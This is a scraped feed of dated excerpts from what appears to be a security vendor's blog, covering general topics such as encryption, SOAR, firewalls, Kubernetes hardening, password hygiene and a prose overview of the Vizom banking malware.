2020-12-15 11:00:00 | Why application-layer encryption is essential for securing confidential data (lien direct) | This blog was written by an independent guest blogger. Your business is growing at a steady rate, and you have big plans for the future. Then, your organization gets hit by a cyberattack, causing a massive data breach. Suddenly, your company’s focus is shifted to sending out letters to angry customers informing them of the incident - which is required by law in most states - and devising strategies to deal with the backlash. This is an all too common scenario for many businesses, and the unfortunate truth is that most organizations fail to adopt the correct cybersecurity procedures until after an attack. The good news is that with a proactive approach to protecting your data, these kinds of nightmares can be avoided. New technology is constantly providing hackers new opportunities to commit cybercrimes. Most organizations have encrypted their data whether it’s stored on the cloud or in a server provided by their web host, but this isn’t enough. Even properly encrypted disc level encryption is vulnerable to security breaches. In this article, we will discuss the weaknesses found in disc level encryption and why it’s best to ensure your data is encrypted at the application layer. We’ll also discuss the importance of active involvement from a cybersecurity team in the beginning stages of application development, and why developers need to have a renewed focus on cybersecurity in a “security-as-code” culture. The importance of application-layer security Organizations all too often have a piecemeal, siloed approach to security. Increasingly competitive tech environments have pushed developers into building new products at a pace cybersecurity experts sometimes can’t keep up with. This is why it’s becoming more common for vulnerabilities to be detected only after an application launches or a data breach occurs. Application layer encryption reduces surface area and encrypts data at the application level. That means if one application is compromised, the entire system does not become at risk. To reduce attack surfaces, individual users and third parties should not have access to encrypted data or keys. This leaves would-be cybercriminals with only the customer-facing end of the application for finding vulnerabilities, and this can be easily protected and audited for security. Building AI and application-layer security into code Application layer security and building security into the coding itself requires that your DevOps and cybersecurity experts work closely together to form a DevSecOps dream team. Developers are increasingly working hand-in-hand with cybersecurity experts from the very beginning stages of software development to ensure a “security-as-code” culture is upheld. However, there are some very interesting developments in AI that present opportunities to streamline this process. In fact, 78% of data scientists agree that artificial intelligence will have the greatest impact on data protection for the decade. Here are four ways AI is transforming application layer security: 1. Misuse detection or application security breach detection Also referred to as signature-based detection, AI systems alert teams when familiar attack patterns are noticed. | Data Breach Vulnerability Threat | Deloitte | |
|
2020-12-14 11:00:00 | How secured are touchless solutions? (lien direct) |
This blog was written by an independent guest blogger.
Image Source: TMC
Touchless solutions have risen to the forefront this year because of the latest pandemic that has reshaped the way we work and live. When social distance policies were placed in motion, borders closed, establishments paused operations, and businesses moved online operating amid lockdown.
Touchless technologies had to be put in place almost everywhere to preserve human touch. It has ceased to be just an option since it is now a necessity in the new normal.
And much as the dreaded physical epidemic that subjected the world to the pandemic, computer hackers have exploited the vulnerability of individuals, institutions, and networks amid the height of the crisis. Here are a number of them:
Cyber attacks against Internet-exposed RDP ports soared from 3 million to 4.5 million between January and March 2020.
Increase in attempted security breaches after March to unexpected remote working setup without comprehensive security planning.
Increase in phishing attacks linked to COVID-19 by 667%.
DDoS attacks accounted for 45% of the recorded security threats, and 43% of those were password login attacks. The remainder is malware attacks, web threats, fraudulent DNS queries against client DNS servers, and unclassified attacks.
Corporate ransomware attacks are up, as in the case of attacks against Honda in June 2020 and severe outages triggered by cyber assaults against Garmin in July 2020. It has been confirmed that the attackers came from the Russian organization, Evil Corp.
Canon suffered a ransomware assault by the Maze ransomware gang in August, where 10 TB (terabytes) of data were taken, private databases, and the like.
Deployment of data mining malware such as remote access Trojan, data thieves, spyware, and banking Trojans with COVID-19 linked information as bait.
Growing amounts of fake news or misinformation are circulating quickly among the public. In a cybercrime survey, around 30% of the countries that participated attested to the spread of false COVID-19 information. Other cyberattacks included fraud via mobile text messages.
3 Examples why we need secured touchless solutions
Despite these attacks, there is still no doubt that the need for more touchless tech is urgent. How can touchless solutions be integrated into the workplace, schools, public utilities, and the like without compromising our security?
1.Opt to use personal instead of shared devices.
We need cloud-based software, storage, and other solutions if we go touchless. Using cloud-based software on p |
Ransomware Malware Tool Vulnerability | ||
|
2020-12-10 11:00:00 | How have digital transactions become safer? (lien direct) |
Image Source: Andrea Piacquadio from Pexels
This blog was written by an independent guest blogger.
With the emergence of cryptocurrencies and massive online marketplaces, keeping your financial information private is a bigger concern than ever. In addition to these new and developing areas, in-person purchasing with debit and credit cards continues to grow. From debit transactions to cryptocurrency, millions of transactions are made daily, and it is cybersecurity experts’ jobs to keep us safe.
The symbiotic nature of technology and digital transactions means that as we develop more ways to spend money, experts find more ways to make transactions safe. Improvements in blockchain technology, decision analytics, and even debit and credit cards have made this more possible than ever. The creation of alternative currencies has pushed blockchain development forward, helping to ensure the safety of not only online transactions but financial transactions in general.
The implementation of EMV chip technology is a major step in the world of digital and in-person transactions. With the use of EMV chips, using credit and debit cards become more secure than ever. So how have all of these advances combined to make digital transactions safer?
Security and cryptocurrency
Bitcoin, the first cryptocurrency, was developed in 2009. Other types of currency have emerged online in the last decade, but all of them exist within a volatile market, with its value and applications fluctuating at a high rate. Existing only in the realm of online markets, cryptocurrency and its ever-increasing popularity have had a distinct effect on security for all digital transactions.
Blockchain technology is the basis for creating a cryptocurrency. Blockchain databases are built so that each new piece of data that is added — such as financial data and personal details — is put into its own “block.” When the next piece of data is added, it makes a new block, which is “chained” to the previous one. This creates a clear chronological timeline with securely stored pieces of information. Information stored this way is accessible, transparent, and easily tracked. This increased security and high-trust technology make cryptocurrency transactions safe and secure.
The use of high-trust, high-security blockchain technology in financial transactions has contributed to the future of cryptocurrency as it becomes more available to the general public. Already, cryptocurrency has given more people access to safe, secure money. When this is combined with other cybersecurity tactics and theories, experts are in an excellent position to secure digital transactions.
PINs and EMV chips
PINs and signatures have been the mainstay of US transaction security for a long time. For credit cards, signatures are required, and with debit cards, a pri |
|||
|
2020-12-10 06:01:00 | What is Security Orchestration Automation and Response? (lien direct) | This blog was written by a third party author. With the face of cyberthreats in a constant state of flux, it’s nearly impossible for IT and Security teams to manually secure their countless systems, applications, services, and devices, as well as respond to potential and active cyberattacks that manage to flourish despite best efforts. Because of the automated nature and sheer magnitude of cyberattacks today, it’s necessary for organizations to utilize toolsets that help to accelerate, simplify, and scale security efforts to strengthen your ability to protect their environment and respond to cyberthreats. One of the most effective ways is through SOAR. What is SOAR? The term SOAR (Security Orchestration, Automation, and Response) generally refers to three specific software capabilities used in tandem to improve your security posture – threat and vulnerability management, incident response, and security operations automation. The term itself, however, provides better insight into what a SOAR solution should do for your organization: Security Orchestration involves integrating typically disparate security tools and automating their processes to reduce complexity and increase the effectiveness of security operations. Security Automation aims to reduce the human involvement in security tasks by using technology to automatically detect, prioritize, and remediate threats. Security Response refers to the planning, managing, monitoring, and reporting of incident response actions once a threat it detected. The overarching goal of SOAR is to make security operations far more responsive, decisive, impactful, and cost-effective. SIEM vs SOAR In order to detect threats, SOAR solutions act a bit like a Security Information and Event Management (SIEM) solution – monitoring and gathering data from various systems, platforms, and applications in an effort to identify anomalies that are potentially threatening. But, SIEM solutions are generally limited to simply alerting Security teams to the existence of the found anomaly and do little to rectify the identified problem. In contrast, SOAR solutions go well beyond SIEM – first proactively assisting with protecting the environment with security orchestration, then providing an ability to automate security tasks that can be used in response to detected threats, and finally the establishing of workflow automation leveraging those tasks to respond more quickly and accurately than any member of the Security team could manually. Does this mean you should skip SIEM? Absolutely not. SIEM solutions are designed to connect with just about any security data source, whereas SOAR solutions are more focused on the O, the A, and the R. Many SOAR solutions either integrate with SIEM solutions as another valuable source of security detail, making SIEM solutions still a needed part of your security strategy. The primary benefits of SOAR SOAR is more than just an opportunity to consolidate solutions and security functions; it’s a shift in the way your organization will proactively prevent attacks, gain insight into threatening actions, and more precisely and quickly respond to threats when they do occur. Some of the key benefits to your organization include: Shortened Mean-Time-To-Respond (MTTR) – SOC and SecOps teams can respond to cyberthreats more quickly through automated response actions that can be performed instantly and automatically. The human factor can become a delay, especially in cases where it’s a verified known threat with a defined specific set of actions needed to remediate the attack. SOAR reduces the time to respond through the joint work of its’ functionalities. | Vulnerability Threat | ||
|
2020-12-09 11:00:00 | 6 Information security predictions for 2021 (lien direct) | This blog was written by an independent guest blogger. Maintaining appropriate information security measures will remain a priority for the foreseeable future, especially with people’s lives becoming increasingly digitized. Here are six trends to expect in the year ahead. 1. An increase in the Zero-Trust approach Taking a zero-trust approach to data and infrastructure security means that an organization never automatically grants access to an employee based on their role in the company or any other characteristic. Instead, authentication and validation occur continuously as a person attempts to access various resources. The zero-trust option is becoming more widely utilized as company IT leaders come to terms with the rising costs of breaches and the fact that cybersecurity issues are happening more frequently. Government agencies traditionally used perimeter-based cybersecurity measures, but even those entities are slowly changing in favor of zero trust. In a recent example, the U.S. Navy used it during the COVID-19 pandemic to deal with the additional security risks of working from home. 2. Company leaders will look for simplicity and convergence in Cybersecurity solutions IT spending decreased in 2020, and analysts expect it to stay on the same track for 2021. That reality means that information security decision-makers will remain mindful of budget constraints as they choose what to buy in the coming year. For example, they will prioritize simplicity and convergence when evaluating possible solutions. The ability to integrate many products into a single platform would be even better from a cost-savings perspective. Secure access service edge (SASE) products are one category that experts anticipate will see growth this year, for example. If information security practitioners integrate as planned, they’ll save time as well as money. 3. Network security will more often include mobile device considerations Research shows that cybercriminals steal more than 24,000 records during each attack, at an average cost of $141 each. It’s easy to see how data breaches become so costly for businesses and why people at those entities must maintain a thorough data security approach. Part of their efforts should include tightening mobile security. Organizations will more often have mobile device security protocols in 2021. Those will stipulate which devices can use the network and which apps employees can access while connected to it. They must also have updated software to avail of the infrastructure. These requirements are crucial, especially considering how many people bring their devices from home to access content at work. 4. More verifications on people trying to access resources People looking at what’s to come in the information security realm also expect a rise in identity-centric security. They believe that a verified identity will be necessary for accessing resources. However, they also say that attacks on the systems that maintain and secure verified identities will rise. Company leaders that choose to impl | Guideline | ||
|
2020-12-08 11:00:00 | Just released! AT&T Cybersecurity Insights™ Report: 5G and the Journey to the Edge (lien direct) | We are certainly in unique times, with COVID driving digital transformation at an unprecedented pace, remote work appearing to be long term, and the specter of new threats looming over security professionals as they strategized how to protect a rapidly changing business and tech landscape. To use perhaps one too many cliches: it is the best of times, it is the worst of times, the times are a changin’, and a change will do you good. No really, it will. The silver lining in all of this is that the transformations enterprises are making today sets the stage for the next generation of compute that will drive business globally — I am talking about 5G and edge computing. Not convinced? Take a peek into the just released AT&T Cybersecurity Insights™ Report: 5G and the Journey to the Edge, which is based on a global survey of 1,000 IT, security, and line-of-business leaders, research from IDC, and dozens of interviews with subject matter experts across security and networking. The report explores how 5G will impact security, including the opportunities for businesses to evolve their security approach and benefits of transitioning to 5G and the edge. Interestingly, data from the report clearly shows that many of the changes companies are making today, such as virtualizing security and network controls and focusing on frameworks like Zero Trust, are bringing them closer to what’s going to be required for securing 5G and the edge, as well as the IoT explosion both will drive. No, 5G infrastructure is not yet globally ubiquitous, but believe-you-me, the world is quickly marching toward that. According to IDC, mid 2020 saw 93 operators having deployed 5G networks across more than 40 countries, and IDC has forecasted that worldwide 5G connections will grow from 13.6 million in 2019 to 1.8 billion by 2024 — which means 5G will make up approximately 15% of all cellular-based mobile and IoT connections. Enterprises are taking notice, with 93.5% worldwide researching, implementing, or having completed a 5G initiative, according to the AT&T global survey for the Insights Report. Yes, the train has left the station. Why? Because 5G and edge provide a leg up for business, and this is clearly being recognized: 60% of enterprises globally believe 5G and edge computing will help to provide a competitive advantage. And so, the digital transformation journey to the edge has begun. As enterprises make this transition, security is the top concern. No surprise, right? However, two key themes, which arose from our research for the Insights Report, are fundamentally shifting the conversation around security . First, security has truly moved from the basement to the boardroom, a change that was no doubt accelerated by COVID and the realization that enterprise networks and the security that protects them are absolutely integral to business continuity. In other words, the digital transformation to 5G and edge computing is not happening without the security stakeholders at the table. Second, and perhaps more importantly, the way we approach security as we move to the future is absolutely going to change. Security leaders are acknowledging the challenge ahead in order to protect the business and minimize risks, while the enterprise attack surface grows exponentially large and complex due to the promise of billions of devices interconnecting in the future. How are they preparing? Here are some highlights from the report. Download your copy for the details. Zero Trust (ZT) has become a top priority, with 94% of enterprises researching, implementing, or having completed a ZT initiative. Security of data is key to moving into a 5G future. Data privacy, data loss and prevention, data encryption, and access to that data, inclu | Threat Guideline | ★★★★ | |
|
2020-12-07 17:49:00 | What is a managed firewall? Benefits, offerings explained (lien direct) | This blog was written by a third party author A firewall can have all the security bells and whistles to keep the bad guys out, but firewalls are only as effective as the people managing them. To get the most out of a firewall, it must be properly managed to ensure it does what it’s supposed to: mitigate threats targeting your business. What is a managed firewall? Monitoring your network can consume significant time, resources and costs. A managed firewall service, provided by a team of security experts, offers solutions that cover the administration, operation, monitoring, and maintenance of your firewall infrastructure. Depending on the offering, managed firewall may involve an assessment of your security threats and monitoring network traffic. Once the MSSP discovers what “normal” traffic looks like, any abnormal traffic patterns can be identified and corrected. Typically, managed firewall solutions include the set-up, maintenance, and modification of firewall rules as well as network monitoring. In addition, they often incorporate detailed analysis, reports and feedback. Patching and updates are commonly an essential part of the solution. Firewalls were not meant as plug and play devices. You can’t just set it up, install it on your network perimeter, and hope it does its job without any human management or expertise. Firewall management requires a significant level of expertise and consistent monitoring. The process of purchasing and setting up the firewall is only the first step in a long process. Common firewall issues and complexities The resources required to manage a firewall represent only a portion of the complexities involved. There are several less tangible issues that arise of which companies should be aware. Balancing user-friendliness and security Firewall rules are business inhibitors if protocols are too restrictive and don’t meet users' access requirements for specific applications or data. Conversely, providing access to more than what is needed to complete job duties can leave companies vulnerable to security breaches and data exfiltration. Absence of auditing While analyzing firewall rules regularly is considered a best practice, many companies often miss this crucial step. Inability to keep up with evolving threats As the threat landscape compounds and a company’s attack surface widens, so does the complexities of managing a firewall. Firewall configurations and rules that may have been sufficient just weeks or months ago, aren’t necessarily effective at blocking cyber threats today. Multiple locations, many firewalls Each of the complexities mentioned above can be enough to handle for a single firewall — but many organizations require multiple firewalls. Each firewall has its own set of rules and configurations. Work can be multiplied with each new firewall deployed. Complexity of industry compliance standards If your company processes payments online, your firewall will need to be PCI DSS compliant. However, the mere act of installing a firewall on your company’s network won’t make you PCI DSS compliant. There are over 20 PCI DSS sub-requirements as a framework for how firewalls should be installed, updated, and maintained to be compliant. Benefits of having a service provider manage your firewall The benefits of working with a managed security service provider (MSSP) for your firewall management go well beyond solving the issues and complexities outlined above. Managed firewall services offer a diverse set of advantages. Empowering digital transformation IT environments are evolving as organizations accelerate adoption of SaaS | Threat Patching Guideline | ||
|
2020-12-07 11:00:00 | Could electric vehicles present a Cybersecurity risk to the grid? (lien direct) |
Credit: Pexels
With many countries now participating in the Paris Agreement to address climate change, coupled with the rising popularity of electric vehicles, it is expected that 125 million electric cars will be on the road worldwide by 2030. But these cars, although beneficial to the environment, come with cybersecurity risks. According to experts, security concerns should be addressed before a massive rollout of electric vehicles take place. While the United States has less than 5.4 million hybrid electric vehicles on its roads (based on numbers from 1999 to 2019), the slow growth of the American market might suddenly experience a spike before cybersecurity risks involving charging stations and the energy grid are reduced or removed.
Policy changes
As the United States started working on policy changes to reduce carbon emissions from its transport sector, 327,000 plug-in electric vehicles were sold in the country. And this was in 2019 alone. Although this is but a dent in the international market, electric vehicles have a bright future in the USA. Plug-in electrics are popular because they run on gasoline and electricity. Environmentally conscious motorists can use electricity to power their plug-ins, and still have a back-up system powered by gasoline if the need arises. And as expected, the savings are huge when it comes to fuel.
New York City noted recently that it is planning to spend $1 billion to improve its car charging infrastructure. Around 50,000 charging stations in NYC are said to be in the works, and are expected to be fully operational by 2025. The State of Florida is also doing the same thing, while other states are offering incentives in the form of rebates to individuals who buy electric vehicles.
Charging stations And Cybersecurity attacks
Although the rising popularity of electric vehicles is good news for America and the planet, their charging stations pose security risks. According to Yury Dvorkin, an electrical and computer engineering expert at New York University, charging stations can be entry points for cyberattacks directed at the American energy grid. The grid, Dvorkin says, is a complex mix of cyber and physical layers. Cybersecurity plays a crucial role in the United States’ transportation infrastructure and its interoperable power systems. Poorly implemented security in charging stations can have a negative impact on critical infrastructure, such as the grid itself and its operators, vehicles, and OEM vendors. Experts say that the concern is quite complicated, as it involves software and equipment vendors, stakeholders, and end users.
Charging station vulnerabilities can lead to exploitation of the grid for gain, according to Dvorkin’s analysis. The assistant professor also explains in his research that electric vehicles that are charging in these charging stations can be hacked simultaneously and cause a disruption on the grid’s stability. Such attacks are possible, according to other experts, since electric vehicles have control interfaces and communication interfaces that interact with the grid. There is good news, however, as Dvorkin and other computer engineering professors say that there is still time for the United States to prepare for |
Hack Guideline | ★★ | |
|
2020-12-03 12:00:00 | Two cybersecurity hygiene actions to improve your digital life in 2021 (lien direct) | This blog was written by an independent guest blogger. It is that time of year again where we start planning resolutions for the coming year. A good start is putting cybersecurity on the top of the list whether you are a business or individual. According to a University of Maryland study, Hackers attack every 39 seconds, on average 2,244 times a day. It may be even higher now that more of us are working remotely because of Covid19 and the attack surface has greatly expanded in numbers and vulnerability. Clearly, with the plethora of breaches, spams, and ransomware we already experienced in 2020, we need to be better prepared in 2021. What are a couple of cybersecurity hygiene action upgrades that will improve outcomes in 2021? #1 Passwords Poor passwords have always been viewed as the low hanging fruit for hackers as the easiest way into the crown jewels of data. Yet, many still use common passwords such as #132456 #password, or birthdays that pose little barriers to letting the bad guys access your accounts, In fact, a UK National Cyber Security Centre 2019 survey analysis discovered that 23.2 million victim accounts from all parts of the world used 123456 as a password. Another 7.8 million data breach victims chose a 12345678 password. More than 3.5 million people globally picked up the word "password" to protect access to their sensitive information. Now that we have all become creatures of social media, hackers can use social engineering tactics by exploring your social media accounts that often highlight pet names (quite often used as passwords - I admit I have been guilty of that too) or other identifiable items that may give clues to passwords and interests. What is particularly alarming is that there are algorithmic programs that can also utilize public social sites and marketing information to “guess” passwords. Actions: remedies are easy to get beyond that bad habit of using easy passwords to crack. Do not use default passwords on your devices and when you do create passwords make them complicated. Consider making them long or using phrases with letters, numbers and characters. Also, do not use the same password for multiple accounts. Make it difficult for hackers to get in with one try. Make their challenges more difficult by using multifactor or biometric authentication such as a fingerprint, facial recognition, or texts to verify it is you when you sign in. And if you want to make things less stressful on your memory (we all forget our passwords), consider using a security token and/or password manager. The bottom line is that secure passwords are a basic step to stronger cyber hygiene. #2 Phishing Phishing is the tool of choice for many hackers. Phishing is commonly defined as a technique of hackers to exfiltrate your valuable data, or to spread malware. Anyone can be fooled by a targeted phish, especially when it appears to be coming as a personal email from someone higher up the work chain, or from a bank, organization or a website you may frequent. Usually the phishing malware comes via email attachments but can also be web-based. According to an analysis by Webroot, 46,000 new phishing sites are created every day and 1.385 million new, unique phishing sites are created each month. At a more granular level, the firm Wandera says that a new phishing site launches every 20 seconds. Advances in technologies have made it easier for hackers to phish. They can use readily available digital graphics, apply social engineering data, and a vast array of phishing tools, including some automated by machine learning. Phishing is often accompanied by ransomware and a tactic for hackers is to target leadership a | Ransomware Data Breach Malware Tool Vulnerability Threat Guideline | ||
|
2020-12-02 12:00:00 | How to secure a Kubernetes cluster (lien direct) | This blog was written by an independent guest blogger. More and more organizations are adopting Kubernetes, but they’re encountering security challenges along the way. In the fall 2020 edition of its “State of Container and Kubernetes Security” report, for instance, StackRox found that nearly 91% of surveyed organizations had adopted Kubernetes, with a majority (75%) of participants revealing that they had deployed the container orchestration platform into their production environments. Even so, nine in 10 respondents said that they had experienced a security incident involving a misconfiguration, vulnerability or runtime error in their container and Kubernetes environments over the last 12 months. Nearly half (44%) went on to say that they had delayed moving an application into production as a result of their security concerns. These findings highlight the need for organizations to ensure their Kubernetes configurations complement their security requirements. As part of this process, administrators can focus in on protecting their clusters, which are part of the Kubernetes architecture. After defining what a cluster is, this blog post will explore the two sets of components that exist within a cluster and provide guidance on how organizations can secure those components along the way. Understanding the Kubernetes cluster On its website, Kubernetes says that customers get a cluster—or a set of one or more worker machines called “nodes” that are responsible for running a containerized application—whenever they deploy Kubernetes. These nodes host pods, groups of one or more containers which function as the application workload’s components. Ultimately, Kubernetes makes it possible for administrators to manage the nodes and the cluster more generally, including events that affect either, by using the control plane. Administrators can secure a Kubernetes cluster by specifically directing their efforts to the control plane and the worker nodes. The control plane Within the control plane, administrators can focus their security measures on five components: kube-apiserver, etcd, kube-scheduler, kube-controller-manager and cloud-controller-manager. kube-apiserver The kube-apiserver is the main implementation of a Kubernetes API server within a Kubernetes deployment. It scales horizontally as administrators deploy more instances of kube-apiserver to balance traffic within their environments. As the front end for the Kubernetes control plane, the API server potentially exposes the Kubernetes API. Administrators can secure this element by upgrading to the newest version of Kubernetes and by applying updates, thereby closing security gaps. From there, administrators can restrict access to the Kubernetes API server by setting up authentication for Kubernetes API clients and ensuring all API traffic is encrypted using TLS. etcd A key value store, etcd functions as the backing store for all Kubernetes cluster data. Administrators might want to consider having a back-up plan for that data. Similar to the kube-apiserver, they can once again turn to encryption, authentication and access control as a means of gaining visibility over read and write access to that data store. kube-scheduler Within the control plane, administrators can use the kube-scheduler component to function for newly created pods that don’t have an a | Vulnerability | Uber | |
|
2020-12-01 12:00:00 | What is Vizom malware? Everything you need to know (lien direct) | This blog was written by an independent guest blogger. Security researchers working with IBM Security recently uncovered a new malware code that is being used to attack online banking users in Brazil. Referred to as ‘Vizom’ by the team, the code utilizes remote overlay attacks to siphon sensitive financial data and make fraudulent transactions from victims bank accounts. What’s particularly concerning about Vizom is its use of malicious DLL’s (Dynamic Link Libraries) to trick the victim’s operating system before loading legitimate DLL’s in place. There has been a drastic increase in malware attacks for 2020 as cybercriminals have been eager to take advantage of the chaos of this year. Even though Vizom is currently mainly being used to target Brazilian-based accounts, there have been a handful of reports of it being used against bank accounts in other South American and European countries as well, so it’s likely to spread further. In this article, we’ll go into specifics of how Vizom works, what makes it so dangerous, and how the malware authors use DLL hijacking and overlays to their advantage. What is Vizom malware? Chen Nahman, Limor Kessem, and Ofir Ozer shocked the world when they announced that the trio had discovered a new malware that attacked people who use video conferencing software. Spam-based phishing campaigns are the starting point for the spread of the Vizom malware that disguises itself as a popular video conferencing software. Once downloaded, the malware begins work on a vulnerable operating system to begin the infection change. After getting access to an unprotected Windows PC, Vizom will first strike the AppData directory, harnessing DLL hijacking that allows the malware to forcefully download harmful DLLs. For those of you who aren’t aware, DLL or dynamic link library is a file that contains code for commonly used program functions on a PC. DLL hijacking, on the other hand, is a type of cyberattack that tries to manipulate the Windows search and load algorithm, giving a malicious hacker unauthorized access to inject code into a specific application. This is made possible through disk manipulation because of the hijacking. DLLs run Microsoft‘s Windows operating systems, putting millions of PC users across the globe at a higher risk of getting duped. Until now, it was only Brazilian bank accounts that had been getting compromised, but as noted previously there are reports of it happening in other countries as well. What is both ironic and concerning here is that video conferencing software is constantly being updated to amp up security. In fact, the whole idea of adopting DevOps methodologies like Continuous Integration and Delivery was to decrease the growing complexity involved in developing software systems. But even after all these precautions, cyberattackers are still succeeding in finding loopholes and developing new malware to exploit those loopholes. Vizom is just one example. Vizom creates variants that are expected by legitimate software in their directories In this case, Vizom names its Delphi-based variants with labels that appear to be legitimate since they are recognized in a software’s directories. IB | Malware | ||
|
2020-11-30 18:03:00 | The perfect storm: How digital transformation is reshaping security and networking (lien direct) | Think back to the end of 2019. Enterprises were evolving IT infrastructure at a moderate pace to reduce costs, be more competitive, and improve their ability to adapt to an increasingly digitized world. Whether migrating workloads to the cloud, virtualizing network functions, diversifying mobility, or moving applications and services closer to the edge, digital transformation was steadily evolving the business landscape. Then came COVID, and in less than 12 months, digital transformation went from that steady evolution to an absolute imperative, accelerated by a suddenly remote workforce and realization that the network (especially user access to data, services, and applications) and its security are the lifeblood of business. Conversations in the C-Suite quickly changed in tone, focusing on one crucial question: How quickly can we pivot and securely update or even rebuild our network to provide for future business continuity and remain competitive? Even as businesses continue to traverse the challenges of the pandemic and remote working, they are building on digital transformation strategies and investments so they can rebound to recovery. According to IDC, investment in digital transformation has been accelerated by the events of the last year, and it will continue to grow at compound annual growth rate (CAGR) of 15.5% from 2020 to 2023, approaching $6.8 trillion. AT&T Cybersecurity also has seen a significant uptick in and acceleration of enterprises embarking on digital transformation. Typically, these initiatives involve wireless access network (WAN) virtualization (a push to SD-WAN) and cloud migration paired with cybersecurity evolution. And they are being set in motion by both the network and security teams, depending on the organization’s priorities. Regardless of who is leading these initiatives, it’s the leadership of the organization that is pushing for change as they come to terms with the challenges of managing and protecting today’s highly complex networks and the connections that support them. With data, users, applications, and devices spread across hybrid environments, connecting to the network from hugely diverse locations, managing and controlling access — authentication and authorization — has taken on unprecedented priority and urgency. In the new reality of remote working, for example, employees must be able to access the applications and data needed to perform their jobs. Without that, the business is at a clear disadvantage. However, security teams are struggling not only to control who and what devices have access, but to also consider when, why, and for which purpose. This has brought the conversation about security to the forefront. Gone are the days of security as an afterthought. Today, a security-first mindset is driving the conversation. Because of this, security approaches like Zero Trust have become mainstream. To this point, a global survey of 1,000 enterprises conducted by AT&T in September 2020 revealed that 95% of enterprises are researching, implementing, or have completed implementation of a Zero Trust initiative in their network. In addition, as the mobility of the workforce continues to expand, IoT data consumption explodes with edge computing , and the attack surface continues to become more complex. Security leaders will be looking for ways to consolidate security tools and decrease the number of vendors they’re working with. However, they also need complete visibility of their complex environment (still yet-to-be-realized for many), to automate processes and in some cases preemptively orchestrate them using advanced analytics, and to improve response times for known threats and | Vulnerability Threat Guideline | ||
|
2020-11-24 06:01:00 | What is Third-Party Risk Management? (lien direct) | Creating and maintaining relationships with third parties brings about multiple risks. Whether your organization is large or small, it’s almost certain that you have business relationships with many third parties for specific types of operations. When operational data and confidential information are exchanged with third parties, that data and information are vulnerable to misuse and exploitation. This is where risk comes into the equation. When these third parties lack robust cybersecurity measures or compliance, building and maintaining a third-party risk management program is a crucial business decision. The process of Third-Party Risk Management (TPRM) involves identifying, assessing and controlling all the various risks that can develop over the entire lifecycle of your relationships with third parties. TPRM often begins during procurement and should continue until the offboarding process is complete. The big-picture potential risks are numerous, and can be reputational, strategic, managerial, and economical. More specific risks include data compromise, illegal use of information by third parties, the detrimental and damaging effects of non-compliance, and irregularities in supply chain management. TPRM by the numbers Still not convinced about the importance of TPRM? The numbers may change your mind. For example, between 2018 and 2019, security breaches increased by 11%, and 67% since 2014. A 2020 Ponemon Institute report notes that over the past two years, 53% of organizations have experienced at least one third-party-caused data breach, with remediation costs averaging $7.5 million. And here’s what might be the most sobering statistic: According to a recent Osano report that observed the direct relationship between poor privacy practices and data breaches, the average American organization shares data with 730 distinct third-party vendors. Of those organizations hit with data breaches, third parties were responsible for two of every three. When you add COVID-19 to the mix, third-party cybersecurity risk is even more of a concern for legal and compliance leaders. Why is TPRM important? Third-party risk management is a hot topic today. Just think about how the supply chain has changed for almost every organization, especially with the digital transformation in place to meet the needs of a changing workforce. Whether it’s new cloud providers, new hosting providers, vendors or suppliers, there are many new companies with which we interact. Even third parties you’ve done business with for years represent a security risk. Look at the infamous Target breach in 2013 — attackers were successful because an employee for Target’s third-party HVAC vendor opened a phishing email and obtained credentials. In this case, the HVAC vendor had more access to Target’s networks than they needed. TPRM mitigates this risk. Plus, today, almost all compliance requirements outline the need for continuous monitoring of your third-party supply chain. Let’s face it: far too often, businesses decide to take their suppliers’ word for it that yes, they are secure. Perhaps in many cases they are. But with so many vendors rotating in and out of our business, how do you manage access to your network or confidential data? When it comes to TPRM, some common questions that you need to ask are as follows: What type of data are third parties accessing? What type of access? Have you given them physical access? What would happen if the third party’s avai | Ransomware Threat Guideline | ||
|
2020-11-18 12:00:00 | 5 questions every higher-ed security leader should ask (lien direct) | Patrick Robinson and Mike McLaughlin contributed to this blog. In the day and age of COVID-19 we have witnessed a transformation of the way we work. If I were asked before March of 2020 how long it would take to make the progress in digital and security transformation that we as a society have made in the last 9 months, I would have guessed at least 5 years. The rate of adoption in the face of the pandemic has been unprecedented. Nowhere have the changes required to make remote working come on faster than with education. Whether it’s K-12 or high-education remote access adoption and the security measures that accompany have been implemented at a blistering pace. This article will lay out a few questions and requests that we at AT&T have been asked by education customers to help them build out better, faster and more secure access for their students, faculty and staff to accommodate for the sudden change in the workplace and learning centers all across the U.S.. How quickly can I get larger internet connections and how can we secure those internet connections effectively from a global standpoint? Speed of increase in bandwidth for most clients depends on several things such as facility availability, turn up time with the carrier and contracting requirements between the customer and the carrier. As for the best way to protect internet connections with dedicated IP addresses, it’s a multiprong effort. With today’s cyber landscape security decision makers have multiple attack vectors to consider when putting a cyber-posture in place. Traditionally a firewall is a given. Firewalling an internet connection still holds true but there is much more to evaluate. Questions to ask yourself: What will you have behind that firewall? Will you deploy a demilitarized zone (DMZ) in the environment to host public facing networks? Are you increasing bandwidth to accommodate remote workers, if so, how many workers will be internal to the network versus external workers who are dialing into the environment? How important is uptime to your business mission? Do you have anything deployed in the cloud that your external users would route to through the internal network (hair-pinning)? Do you want to make users authenticate with network credentials at the gateway or do you want the users to authenticate multiple times (once for VPN and once or more times for network access)? Do you have multiple locations tying into the location with the increased bandwidth through site to site VPN or Software Defined Wide Area Networking? Do you utilize Multi-Protocol Label Switching (MPLS) between sites? Do you have industry compliance requirements to meet? Will you be running Next Generation Firewall Subscription services on your gateway (edge) firewalls? Do your organization’s uptime requirements require that a high-availability configuration is required to attempt to achieve 5x9’s reliability minimum? As you can see there isn’t just one definitive answer to the question of “what should I use to protect my users, internal network and upgraded bandwidth”? With the number of Distributed Denial of Service (DDoS) attacks that have become so prevalent with higher-ed institutions in the last year, DDoS Mitigation Security services are essential and are usually very affordable to monitor for volumetric attacks. However, of course, the more that the customer monitors for, and the more mitigation time that the customer requires, the more expensive the service can become. A few of things to think about with DDoS attacks when deciding what you need for your new circuit: Where might the attacks be coming from? Do a little research on the attack vectors for D | Ransomware Malware Guideline | ||
|
